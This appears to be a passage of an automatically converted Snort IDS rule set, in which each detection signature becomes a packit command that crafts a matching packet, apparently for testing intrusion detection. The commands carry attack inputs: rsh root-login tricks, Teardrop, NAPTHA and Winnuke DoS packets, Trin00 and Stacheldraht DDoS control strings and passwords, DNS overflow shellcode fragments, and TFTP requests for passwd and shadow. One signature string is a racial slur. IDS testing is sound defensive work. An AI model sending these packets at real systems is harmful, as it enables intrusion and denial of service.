$HOME_NET --D 111 -p "† " -p "" -p "†Ť" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap RQUOTA request UDP" classtype:rpc-portmap-decode sid:1961 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ť" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap RQUOTA request TCP" classtype:rpc-portmap-decode sid:1962 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ť" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,128,0,relative "RPC RQUOTA getquota overflow attempt UDP" cve,CVE-1999-0974 bugtraq,864 classtype:misc-attack sid:1963 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p 
"†Ť" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,128,0,relative "RPC RQUOTA getquota overflow attempt TCP" cve,CVE-1999-0974 bugtraq,864 classtype:misc-attack sid:2024 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ó" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap ttdbserv request UDP" bugtraq,122 arachnids,24 cve,CAN-2001-0717 cve,CVE-1999-0003 cve,CVE-1999-0687 cve,CAN-1999-1075 url,www.cert.org/advisories/CA-2001-05.html classtype:rpc-portmap-decode sid:588 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ó" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap ttdbserv request TCP" bugtraq,122 arachnids,24 cve,CAN-2001-0717 cve,CVE-1999-0003 cve,CVE-1999-0687 cve,CAN-1999-1075 url,www.cert.org/advisories/CA-2001-05.html classtype:rpc-portmap-decode sid:1274 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†ó" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,128,0,relative "RPC tooltalk UDP overflow attempt" cve,CVE-1999-0003 bugtraq,122 classtype:misc-attack sid:1964 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†ó" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,128,0,relative "RPC tooltalk TCP overflow attempt" cve,CVE-1999-0003 bugtraq,122 classtype:misc-attack sid:1965 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Š" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap yppasswd request UDP" arachnids,14 classtype:rpc-portmap-decode sid:589 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Š" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap yppasswd request TCP" arachnids,14 classtype:rpc-portmap-decode sid:1275 #packit -t UDP -s 
$EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,64,0,relative "RPC yppasswd old password overflow attempt UDP" classtype:rpc-portmap-decode sid:2027 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,64,0,relative "RPC yppasswd old password overflow attempt TCP" classtype:rpc-portmap-decode sid:2028 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,0,relative,align byte_test:4,>,64,0,relative "RPC yppasswd username overflow attempt UDP" classtype:rpc-portmap-decode cve,CVE-2001-0779 bugtraq,2763 sid:2025 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,0,relative,align byte_test:4,>,64,0,relative "RPC yppasswd username overflow attempt TCP" classtype:rpc-portmap-decode cve,CVE-2001-0779 bugtraq,2763 sid:2026 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,0,relative,align byte_jump:4,0,relative,align byte_test:4,>,64,0,relative "RPC yppasswd new password overflow attempt UDP" classtype:rpc-portmap-decode sid:2029 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,0,relative,align byte_jump:4,0,relative,align byte_test:4,>,64,0,relative "RPC yppasswd new password overflow attempt TCP" classtype:rpc-portmap-decode sid:2030 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" # "RPC yppasswd user update UDP" classtype:rpc-portmap-decode sid:2031 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Š" -p "" -p "" # "RPC yppasswd user update TCP" 
classtype:rpc-portmap-decode sid:2032 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†¤" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap ypserv request UDP" bugtraq,6016 bugtraq,5914 cve,CAN-2002-1232 cve,CVE-2000-1042 cve,CVE-2000-1043 arachnids,12 classtype:rpc-portmap-decode sid:590 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†¤" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap ypserv request TCP" bugtraq,6016 bugtraq,5914 cve,CAN-2002-1232 cve,CVE-2000-1042 cve,CVE-2000-1043 arachnids,12 classtype:rpc-portmap-decode sid:1276 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†¤" -p " " -p "" # "RPC ypserv maplist request UDP" bugtraq,6016 bugtraq,5914 cve,CAN-2002-1232 classtype:rpc-portmap-decode sid:2033 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†¤" -p " " -p "" # "RPC ypserv maplist request TCP" bugtraq,6016 bugtraq,5914 Cve,CAN-2002-1232 classtype:rpc-portmap-decode sid:2034 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p " p" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap network-status-monitor request UDP" classtype:rpc-portmap-decode sid:2035 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p " p" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap network-status-monitor request TCP" classtype:rpc-portmap-decode sid:2036 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p " p" -p "" -p "" # "RPC network-status-monitor mon-callback request UDP" classtype:rpc-portmap-decode sid:2037 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p " p" -p "" -p "" # "RPC network-status-monitor mon-callback request TCP" classtype:rpc-portmap-decode sid:2038 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ľ" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align 
"RPC portmap nlockmgr request UDP" cve,CVE-2000-0508 bugtraq,1372 classtype:rpc-portmap-decode sid:2079 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ľ" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap nlockmgr request TCP" cve,CVE-2000-0508 bugtraq,1372 classtype:rpc-portmap-decode sid:2080 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "÷h" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rpc.xfsmd request UDP" cve,CAN-2002-0359 bugtraq,5075 classtype:rpc-portmap-decode sid:2081 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "÷h" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rpc.xfsmd request TCP" cve,CAN-2002-0359 bugtraq,5075 classtype:rpc-portmap-decode sid:2082 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "÷h" -p " " -p "" # "RPC rpc.xfsmd xfs_export attempt UDP" cve,CAN-2002-0359 bugtraq,5075 classtype:rpc-portmap-decode sid:2083 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "÷h" -p " " -p "" # "RPC rpc.xfsmd xfs_export attempt TCP" cve,CAN-2002-0359 bugtraq,5075 classtype:rpc-portmap-decode sid:2084 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡}" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap kcms_server request UDP" cve,CAN-2003-0027 url,www.kb.cert.org/vuls/id/850785 classtype:rpc-portmap-decode sid:2005 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡}" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap kcms_server request TCP" cve,CAN-2003-0027 url,www.kb.cert.org/vuls/id/850785 classtype:rpc-portmap-decode sid:2006 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 32771:34000 -p "‡}" -p "/../" -p "" #Cannot convert: byte_jump:4,20,relative,align byte_jump:4,4,relative,align "RPC kcms_server directory 
traversal attempt" cve,CAN-2003-0027 url,www.kb.cert.org/vuls/id/850785 classtype:misc-attack sid:2007 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "‡ˆ" -p "" -p "" #Cannot convert: byte_jump:4,8,relative,align "RPC sadmind query with root credentials attempt TCP" classtype:misc-attack sid:2255 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "‡ˆ" -p "" -p "" #Cannot convert: byte_jump:4,8,relative,align "RPC sadmind query with root credentials attempt UDP" classtype:misc-attack sid:2256 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 513 -p "::::::::::::::::" # "RSERVICES rlogin LinuxNIS" classtype:bad-unknown sid:601 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 513 -p "binbin" # "RSERVICES rlogin bin" arachnids,384 classtype:attempted-user sid:602 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 513 -p "echo \" + + \"" # "RSERVICES rlogin echo++" arachnids,385 classtype:bad-unknown sid:603 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 513 -p "-froot" # "RSERVICES rsh froot" arachnids,387 classtype:attempted-admin sid:604 packit -t TCP -s $HOME_NET --S 513 -d $EXTERNAL_NET -p "rlogind: Permission denied." 
# "RSERVICES rlogin login failure" arachnids,392 classtype:unsuccessful-user sid:611 packit -t TCP -s $HOME_NET --S 513 -d $EXTERNAL_NET -p "login incorrect" # "RSERVICES rlogin login failure" arachnids,393 classtype:unsuccessful-user sid:605 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 513 -p "rootroot" # "RSERVICES rlogin root" arachnids,389 classtype:attempted-admin sid:606 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 514 -p "binbin" # "RSERVICES rsh bin" arachnids,390 classtype:attempted-user sid:607 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 514 -p "echo \"+ +\"" # "RSERVICES rsh echo + +" arachnids,388 classtype:attempted-user sid:608 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 514 -p "-froot" # "RSERVICES rsh froot" arachnids,387 classtype:attempted-admin sid:609 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 514 -p "rootroot" # "RSERVICES rsh root" arachnids,391 classtype:attempted-admin sid:610 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 512 -p "" -p "" -p "" # "RSERVICES rexec username overflow attempt" classtype:attempted-admin sid:2113 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 512 -p "" -p "" -p "" # "RSERVICES rexec password overflow attempt" classtype:attempted-admin sid:2114 #packit -s $EXTERNAL_NET -d $HOME_NET #Cannot convert: dsize:408 "DOS Jolt attack" cve,CAN-1999-0345 classtype:attempted-dos sid:268 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -n 242 # "DOS Teardrop attack" cve,CAN-1999-0015 url,www.cert.org/advisories/CA-1997-28.html bugtraq,124 classtype:attempted-dos sid:270 packit -t UDP --S 19 --D 7 # "DOS UDP echo+chargen bomb" cve,CAN-1999-0635 cve,CVE-1999-0103 classtype:attempted-dos sid:271 packit -t UDP --D 19 --S 7 # "DOS UDP echo+chargen bomb" cve,CAN-1999-0635 cve,CVE-1999-0103 classtype:attempted-dos sid:271 packit -s $EXTERNAL_NET -d $HOME_NET -p "" -t ip_proto: 2 # "DOS IGMP dos attack" cve,CVE-1999-0918 classtype:attempted-dos sid:272 packit -s $EXTERNAL_NET -d $HOME_NET -p "" -t ip_proto:2 # "DOS IGMP 
dos attack" cve,CVE-1999-0918 classtype:attempted-dos sid:273 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -p "+++ath" # "DOS ath" nocase-ignored cve,CAN-1999-1228 arachnids,264 classtype:attempted-dos sid:274 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -F SYN -q 6060842 -n 413 # "DOS NAPTHA" cve,CAN-2000-1039 url,www.microsoft.com/technet/security/bulletin/MS00-091.asp url,www.cert.org/advisories/CA-2000-21.html url,razor.bindview.com/publish/advisories/adv_NAPTHA.html bugtraq,2022 classtype:attempted-dos sid:275 packit -t TCP -d $EXTERNAL_NET -s $HOME_NET -F SYN -q 6060842 -n 413 # "DOS NAPTHA" cve,CAN-2000-1039 url,www.microsoft.com/technet/security/bulletin/MS00-091.asp url,www.cert.org/advisories/CA-2000-21.html url,razor.bindview.com/publish/advisories/adv_NAPTHA.html bugtraq,2022 classtype:attempted-dos sid:275 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 7070 -p "˙ô˙ý" # "DOS Real Audio Server" bugtraq,1288 cve,CVE-2000-0474 arachnids,411 classtype:attempted-dos sid:276 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 7070 -p "/viewsource/template.html?" # "DOS Real Server template.html" nocase-ignored cve,CVE-2000-0474 bugtraq,1288 classtype:attempted-dos sid:277 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 8080 -p "/viewsource/template.html?" 
# "DOS Real Server template.html" nocase-ignored cve,CVE-2000-0474 bugtraq,1288 classtype:attempted-dos sid:278 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 161 #Cannot convert: dsize:0 "DOS Bay/Nortel Nautica Marlin" bugtraq,1009 cve,CVE-2000-0221 classtype:attempted-dos sid:279 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 9 -p "NAMENAME" # "DOS Ascend Route" bugtraq,714 cve,CVE-1999-0060 arachnids,262 classtype:attempted-dos sid:281 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 617 #Cannot convert: dsize:>1445 "DOS arkiea backup" bugtraq,662 cve,CVE-1999-0788 arachnids,261 classtype:attempted-dos sid:282 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 135:139 -F URG # "DOS Winnuke attack" bugtraq,2010 cve,CVE-1999-0153 classtype: attempted-dos sid:1257 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 3372 #Cannot convert: dsize:>1023 "DOS MSDTC attempt" bugtraq,4006 classtype:attempted-dos sid:1408 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 6004 -p "˙˙˙˙˙˙" # "DOS iParty DOS attempt" classtype:misc-attack cve,CAN-1999-1566 sid:1605 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 6789:6790 #Cannot convert: dsize:1 "DOS DB2 dos attempt" classtype:denial-of-service sid:1641 #packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D 80 -p "" #Cannot convert: dsize:1 "DOS Cisco attempt" classtype:web-application-attack sid:1545 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -n 678 -p "1234" # "DDOS TFN Probe" arachnids,443 classtype:attempted-recon sid:221 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -N icmp_id: 0 -p "AAAAAAAAAA" # "DDOS tfn2k icmp possible communication" arachnids,425 classtype:attempted-dos sid:222 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 31335 -p "PONG" # "DDOS Trin00 Daemon to Master PONG message detected" arachnids,187 classtype:attempted-recon sid:223 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -N icmp_id: 456 -Q icmp_seq: 0 # "DDOS TFN client command BE" arachnids,184 classtype:attempted-dos sid:228 packit -t TCP -s 
$EXTERNAL_NET -d $HOME_NET --D 20432 # "DDOS shaft client to handler" arachnids,254 classtype:attempted-dos sid:230 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 31335 -p "l44" # "DDOS Trin00 Daemon to Master message detected" arachnids,186 classtype:attempted-dos sid:231 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 31335 -p "*HELLO*" # "DDOS Trin00 Daemon to Master *HELLO* message detected" arachnids,185 url,www.sans.org/newlook/resources/IDFAQ/trinoo.htm classtype:attempted-dos sid:232 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 27665 -p "betaalmostdone" # "DDOS Trin00 Attacker to Master default startup password" arachnids,197 classtype:attempted-dos sid:233 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 27665 -p "gOrave" # "DDOS Trin00 Attacker to Master default password" classtype:attempted-dos sid:234 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 27665 -p "killme" # "DDOS Trin00 Attacker to Master default mdie password" classtype:bad-unknown sid:235 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 27444 -p "l44adsl" # "DDOS Trin00 Master to Daemon default password attempt" arachnids,197 classtype:attempted-dos sid:237 packit -t ICMP -s $HOME_NET -d $EXTERNAL_NET -N icmp_id:123 -Q icmp_seq:0 -p "shell bound to port" # "DDOS TFN server response" arachnids,182 classtype:attempted-dos sid:238 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 18753 -p "alive tijgu" # "DDOS shaft handler to agent" arachnids,255 classtype:attempted-dos sid:239 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 20433 -p "alive" # "DDOS shaft agent to handler" arachnids,256 classtype:attempted-dos sid:240 packit -t TCP -s $HOME_NET -d $EXTERNAL_NET -F SYN -q 674711609 # "DDOS shaft synflood" arachnids,253 classtype:attempted-dos sid:241 packit -t TCP -d $HOME_NET -s $EXTERNAL_NET -F SYN -q 674711609 # "DDOS shaft synflood" arachnids,253 classtype:attempted-dos sid:241 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 6838 -p "newserver" # "DDOS mstream agent to handler" 
classtype:attempted-dos sid:243 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 10498 -p "stream/" # "DDOS mstream handler to agent" cve,CAN-2000-0138 classtype:attempted-dos sid:244 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 10498 -p "ping" # "DDOS mstream handler ping to agent" cve,CAN-2000-0138 classtype:attempted-dos sid:245 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 10498 -p "pong" # "DDOS mstream agent pong to handler" classtype:attempted-dos sid:246 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 12754 -p ">" # "DDOS mstream client to handler" cve,CAN-2000-0138 classtype:attempted-dos sid:247 packit -t TCP -s $HOME_NET --S 12754 -d $EXTERNAL_NET -p ">" # "DDOS mstream handler to client" cve,CAN-2000-0138 classtype:attempted-dos sid:248 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 15104 -F SYN # "DDOS mstream client to handler" arachnids,111 cve,CAN-2000-0138 classtype:attempted-dos sid:249 packit -t TCP -s $HOME_NET --S 15104 -d $EXTERNAL_NET -p ">" # "DDOS mstream handler to client" cve,CAN-2000-0138 classtype:attempted-dos sid:250 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -N icmp_id: 51201 -Q icmp_seq: 0 # "DDOS - TFN client command LE" arachnids,183 classtype:attempted-dos sid:251 packit -t ICMP -s 3.3.3.3/32 -d $EXTERNAL_NET -N icmp_id: 666 # "DDOS Stacheldraht server spoof" arachnids,193 classtype:attempted-dos sid:224 packit -t ICMP -s $HOME_NET -d $EXTERNAL_NET -p "sicken" -N icmp_id: 669 # "DDOS Stacheldraht gag server response" arachnids,195 classtype:attempted-dos sid:225 packit -t ICMP -s $HOME_NET -d $EXTERNAL_NET -p "ficken" -N icmp_id: 667 # "DDOS Stacheldraht server response" arachnids,191 classtype:attempted-dos sid:226 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -p "spoofworks" -N icmp_id: 1000 # "DDOS Stacheldraht client spoofworks" arachnids,192 classtype:attempted-dos sid:227 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -p "gesundheit!" 
-N icmp_id: 668 # "DDOS Stacheldraht client check gag" arachnids,194 classtype:attempted-dos sid:236 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -p "skillz" -N icmp_id: 666 # "DDOS Stacheldraht client check skillz" arachnids,190 classtype:attempted-dos sid:229 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -p "niggahbitch" -N icmp_id:9015 # "DDOS Stacheldraht handler->agent (niggahbitch)" url,staff.washington.edu/dittrich/misc/stacheldraht.analysis classtype:attempted-dos sid:1854 packit -t ICMP -d $EXTERNAL_NET -s $HOME_NET -p "niggahbitch" -N icmp_id:9015 # "DDOS Stacheldraht handler->agent (niggahbitch)" url,staff.washington.edu/dittrich/misc/stacheldraht.analysis classtype:attempted-dos sid:1854 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -p "skillz" -N icmp_id:6666 # "DDOS Stacheldraht agent->handler (skillz)" url,staff.washington.edu/dittrich/misc/stacheldraht.analysis classtype:attempted-dos sid:1855 packit -t ICMP -d $EXTERNAL_NET -s $HOME_NET -p "skillz" -N icmp_id:6666 # "DDOS Stacheldraht agent->handler (skillz)" url,staff.washington.edu/dittrich/misc/stacheldraht.analysis classtype:attempted-dos sid:1855 packit -t ICMP -s $EXTERNAL_NET -d $HOME_NET -p "ficken" -N icmp_id:6667 # "DDOS Stacheldraht handler->agent (ficken)" url,staff.washington.edu/dittrich/misc/stacheldraht.analysis classtype:attempted-dos sid:1856 packit -t ICMP -d $EXTERNAL_NET -s $HOME_NET -p "ficken" -N icmp_id:6667 # "DDOS Stacheldraht handler->agent (ficken)" url,staff.washington.edu/dittrich/misc/stacheldraht.analysis classtype:attempted-dos sid:1856 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "ü" # "DNS zone transfer TCP" cve,CAN-1999-0532 arachnids,212 classtype:attempted-recon sid:255 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "ü" # "DNS zone transfer UDP" cve,CAN-1999-0532 arachnids,212 classtype:attempted-recon sid:1948 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "authors" -p "bind" # "DNS named authors attempt" nocase-ignored nocase-ignored 
nessus,10728 arachnids,480 classtype:attempted-recon sid:1435 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "authors" -p "bind" # "DNS named authors attempt" nocase-ignored nocase-ignored nessus,10728 arachnids,480 classtype:attempted-recon sid:256 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "version" -p "bind" # "DNS named version attempt" nocase-ignored nocase-ignored nocase-ignored nessus,10028 arachnids,278 classtype:attempted-recon sid:257 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "version" -p "bind" # "DNS named version attempt" nocase-ignored nocase-ignored nessus,10028 arachnids,278 classtype:attempted-recon sid:1616 packit -t UDP -s $EXTERNAL_NET --S 53 -d $HOME_NET -p "…€" -p "Ŕ <" # "DNS SPOOF query response PTR with TTL of 1 min. and no authority" classtype:bad-unknown sid:253 packit -t UDP -s $EXTERNAL_NET --S 53 -d $HOME_NET -p "€" -p "Ŕ <" # "DNS SPOOF query response with TTL of 1 min. and no authority" classtype:bad-unknown sid:254 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "../../../" # "DNS EXPLOIT named 8.2->8.2.1" cve,CVE-1999-0833 bugtraq,788 classtype:attempted-admin sid:258 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "ŤÍ € a" # "DNS EXPLOIT named tsig overflow attempt" cve,CVE-2001-0010 bugtraq,2302 arachnids,482 classtype:attempted-admin sid:303 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "€?" 
# "DNS EXPLOIT named tsig overflow attempt" classtype:attempted-admin sid:314 cve,CVE-2001-0010 bugtraq,2303 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "thisissometempspaceforthesockinaddrinyeahyeahiknowthisislamebutanywaywhocareshorizongotitworkingsoalliscool" # "DNS EXPLOIT named overflow (ADM)" cve,CVE-1999-0833 bugtraq,788 classtype:attempted-admin sid:259 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "ADMROCKS" # "DNS EXPLOIT named overflow (ADMROCKS)" cve,CVE-1999-0833 url,www.cert.org/advisories/CA-1999-14.html bugtraq,788 classtype:attempted-admin sid:260 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "̀č×˙˙˙/bin/sh" # "DNS EXPLOIT named overflow attempt" url,www.cert.org/advisories/CA-1998-05.html classtype:attempted-admin sid:261 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "1Ŕ°?1Űł˙1É̀1Ŕ" # "DNS EXPLOIT x86 Linux overflow attempt" classtype:attempted-admin sid:262 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "1Ŕ°̀…ŔuLëL^°" # "DNS EXPLOIT x86 Linux overflow attempt" classtype:attempted-admin sid:264 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "‰÷)ljó‰ů‰ňŹ<ţ" # "DNS EXPLOIT x86 Linux overflow attempt (ADMv2)" classtype:attempted-admin sid:265 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "ën^Ćš1ɉNĆF" # "DNS EXPLOIT x86 FreeBSD overflow attempt" classtype:attempted-admin sid:266 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 53 -p "Ŕ ’ Đ#żř" # "DNS EXPLOIT sparc overflow attempt" classtype:attempted-admin sid:267 packit -t UDP --D 69 -p "" -p !"" # "TFTP filename overflow attempt" cve,CAN-2002-0813 bugtraq,5328 classtype:bad-unknown sid:1941 packit -t UDP --D 69 -p "" -p "admin.dll" # "TFTP GET Admin.dll" nocase-ignored classtype:successful-admin url,www.cert.org/advisories/CA-2001-26.html sid:1289 packit -t UDP --D 69 -p "" -p "nc.exe" # "TFTP GET nc.exe" nocase-ignored classtype:successful-admin sid:1441 packit -t UDP --D 69 -p "" -p "shadow" # "TFTP GET shadow" nocase-ignored 
classtype:successful-admin sid:1442 packit -t UDP --D 69 -p "" -p "passwd" # "TFTP GET passwd" nocase-ignored classtype:successful-admin sid:1443 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 69 -p ".." # "TFTP parent directory" cve,CAN-2002-1209 arachnids,137 cve,CVE-1999-0183 classtype:bad-unknown sid:519 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 69 -p "/" # "TFTP root directory" arachnids,138 cve,CVE-1999-0183 classtype:bad-unknown sid:520 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 69 -p "" # "TFTP Put" cve,CVE-1999-0183 arachnids,148 classtype:bad-unknown sid:518 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 69 -p "" # "TFTP Get" classtype:bad-unknown sid:1444 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/hsx.cgi" -p "../../" -p "%00" # "WEB-CGI HyperSeek hsx.cgi directory traversal attempt" bugtraq,2314 cve,CAN-2001-0253 classtype:web-application-attack sid:803 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/hsx.cgi" # "WEB-CGI HyperSeek hsx.cgi access" bugtraq,2314 cve,CAN-2001-0253 classtype:web-application-activity sid:1607 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/s.cgi" -p "tmpl=" # "WEB-CGI SWSoft ASPSeek Overflow attempt" nocase-ignored cve,CAN-2001-0476 bugtraq,2492 classtype:web-application-attack sid:804 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/wsisa.dll/WService=" -p "WSMadmin" # "WEB-CGI webspeed access" nocase-ignored nocase-ignored arachnids,467 cve,CVE-2000-0127 nessus,10304 classtype:attempted-user sid:805 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/YaBB" -p "../" # "WEB-CGI yabb directory traversal attempt" nocase-ignored cve,CVE-2000-0853 arachnids,462 bugtraq,1668 classtype:attempted-recon sid:806 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D 